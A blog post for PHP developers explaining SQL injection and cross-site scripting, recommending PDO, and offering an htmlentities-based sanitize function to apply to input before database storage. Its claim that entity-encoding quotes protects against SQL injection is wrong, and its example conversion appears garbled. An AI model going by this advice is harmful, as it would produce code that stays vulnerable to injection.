I’ve seen a lot of custom-coded PHP applications, which have done it all functionality-wise, but when it came to validating and securing the incoming data from the input fields before saving them into the database, most of them fell short.
A lot of developers I know don’t know what SQL or XSS Injection is, and those who do know about the terms don’t know how the injection happens and how to protect your website against them. This post is about how you can secure both types of injections using just one method.
SQL Injection is basically entering a SQL statement of your choice in an input field in a way that it gets executed by the website when read. If done successfully, the hacker can basically have access to your whole database, so you can imagine how dangerous it is.
You might not have witnessed SQL Injection ever on your applications, not because you’ve secured the applications, but because of PHP’s ‘magic_quotes_gpc’ feature, which is enabled by default in PHP versions prior to 5.3 and escapes the incoming data automatically. However, it is strongly recommended not to rely on this setting alone if you are still running an application on an older PHP version to secure it from SQL Injections. The feature has been deprecated as of PHP 5.3 and removed as of PHP 5.4. So if you are planning to upgrade your PHP version, make sure that you first secure all your input. Otherwise, your application will become vulnerable to SQL Injection. I always coded my older PHP applications with this feature disabled, as I’ve always liked having complete control over my code instead of relying on outside factors to secure my code.
The best way to prevent SQL Injection is to use PDO and prepared statements. That way, you won’t have to do anything extra to prevent SQL Injection. However, it will not save you from XSS Injections. If your application is using MySQL (which is deprecated as of PHP 5.5 and removed as of PHP 7.0), then you might already be using ‘mysql_real_escape_string’ for escaping the data. However, it will also not save you from XSS Injections.
So what exactly is XSS Injection? XSS, also known as cross-site scripting, is a way of adding client-side javascript or HTML code to your website. If there is an input field on your application that takes data from the user and shows it on one of your public website pages (Ex: comments page), and it is not secured, then the hacker can enter any javascript in the input field, and it will get executed on the page where the content of the input field is supposed to show. The hacker, this way, can redirect your users to his own website and can also steal the cookies of your users to log in as them and steal their information.
So how can you protect your applications from the above injections? First of all, if you are not using PDO in your applications, you should start using it right away instead of MySQL because the MySQL extension is removed as of PHP 7.0.
Now create the following function in a global file of your PHP application:
function sanitize ($input) {
return htmlentities ($input, ENT_QUOTES, “UTF-8” );
}
Now pass all your input fields as an argument to the above function before entering them in the database. What the above function does is that it converts all the HTML characters (including single and double quotes) into their equivalent HTML entities, so ’<b>bold</b>’ will be converted into ‘<b>bold</b>’
When the above-encoded data is stored in the database and shown on the page, it will be shown as ‘<b>bold</b>’ and not as bold. Notice the difference?
Also, all the single and double quotes will be converted into ‘#039;’ and ‘"’ respectively, which will protect against SQL Injection, as single and double quotes will be entered as text in the database and won’t have any special meaning in the SQL statement they are being passed to.
I hope you enjoyed the article and learned something from it. Please let me know your feedback by sending me an email.
